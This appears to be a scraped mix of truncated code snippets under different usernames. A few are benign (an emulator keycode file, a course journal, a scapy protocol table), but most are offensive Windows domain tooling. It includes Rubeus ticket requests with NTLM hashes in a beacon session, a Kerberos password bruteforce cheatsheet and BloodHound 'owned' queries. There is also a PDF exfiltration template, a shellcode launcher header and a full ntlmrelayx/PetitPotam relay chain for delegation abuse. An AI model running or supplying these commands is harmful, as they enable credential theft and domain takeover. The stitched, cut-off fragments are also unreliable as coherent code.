rickyzhang82

# /usr/share/BasiliskII/keycodes
#
# Basilisk II (C) 1997-2005 Christian Bauer
#
# This file is used to translate the (server-specific) scancodes to
# Mac keycodes depending on the window server being used.
#
# The format of this file is as follows:
#
# sdl <driver string>

anacromaniac

This will be the engineering journal that i will write during my journey with Cisco Networking Academy.

1 - DONE
2 - DONE
3 - DONE
4 - DONE
5 - DONE
6 - DONE
7 - DONE
8 - DONE

Ari-Roda

from scapy.all import *    #import scapy module to python
from sklearn.externals import joblib
import pandas as pd

thisdict =	{ 1:"icmp",3:"ggp",6: "tcp", 11:"nvp", 12:"pup", 17: "udp", 28:"irtp",39: "tp++", 41:"ipv6" , 42:"sdrp",46:"rsvp", 47: "gre", 53: "swipe" ,55:"mobile" , 56: "tlsp", 57: "skip" , 59:"ipv6-no", 77: "sun-nd", 87: "tcf" ,89: "ospf", 103: "pim", 105:"scps",129:"iplt", 132: "sctp",
              133:"fc", 82:"secure-vmtp", 94:"ipip", 108:"ipcomp", 85:"nsfnet-igp", 100:"gmtp", 25:"leaf-1", 98:"encap", 95:"micp", 84:"ttp",86:"dgp", 32:"merit-inp", 10: "bbn-rcc", 109:"snp", 15:"xnet",
              44:"ipv6-frag", 79:"wb-expak", 69:"sat-mon", 7:"cbt", 107:"a/n", 23:"trunk-1", 70:"visa", 27:"rdp", 18:"mux", 104:"aris", 20:"hmp", 75:"pvp", 64:"sat-expak", 121:"smp", 22:"xns-idp", 30:"netblt",
              126:"crtp", 16:"chaos", 131:"pipe", 31:"mfe-nsp", 40:"il", 110:"compaq-peer", 92:"mtp", 120:"uti", 90:"sprite-rpc", 24:"trunk-2", 74:"wsn", 37:"ddp", 76:"br-sat-mon",80:"iso-ip", 8:"egp",
    

HarmJ0y

Windows version:
	reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion

Users who have authed to the system:
	ls C:\Users\

System env variables:
	reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment

Saved outbound RDP connections:

HarmJ0y

##### IF ELEVATED:

# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH

# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi

# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter

seajaysec

{
    "queries": [{
            "name": "List all owned users",
            "queryList": [{
                "final": true,
                "query": "MATCH (m:User) WHERE m.owned=TRUE RETURN m"
            }]
        },
        {
            "name": "List all owned computers",

TarlogicSecurity

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

Areizen

from binascii import hexlify
import sys
import re


# PDF TEMPLATE, index number should be shifted enough to avoid collision with number of the object
# we want to exfiltrate
PDF_TEMPLATE = """%PDF-2.0

100 0 obj

peewpw

# 64 bit compatible shellcode launcher
#
# The versions of this I've attempted to use appear to only work in 32bit Python (at least for 3.7-8).
# Hence why this was neede to solve a problem.
#
# based on work from:
#   http://www.debasish.in/2012/04/execute-shellcode-using-python.html
#   https://www.christophertruncer.com/shellcode-manipulation-and-injection-in-python-3/
#   https://stackoverflow.com/a/61258392
#

zimnyaa

# setting up a DNS record in the domain, the zone I required was found in ForestDNSZones
python3 ./krbrelayx/dnstool.py -u DOMAIN\\zimnyaa -p <PASSWORD> -a add -r testrecord -d <MY_IP> --forest DC1.DOMAIN.local

# setting up a LDAPS relay to grant RBCD to computer account we have
# in my case MAQ = 0, so I escalated on a domain workstation and used it
sudo impacket-ntlmrelayx -smb2support -t ldaps://DC1.DOMAIN.local --http-port 8080 --delegate-access --escalate-user MYWS\$ --no-dump --no-acl --no-da

# PetitPotam to WebDAV with domain credentials (not patched)
# DO NOT use FQDN here
python3 PetitPotam.py -d DOMAIN.local -u zimnyaa -p <PASSWORD> testrecord@8080/a TARGETSERVER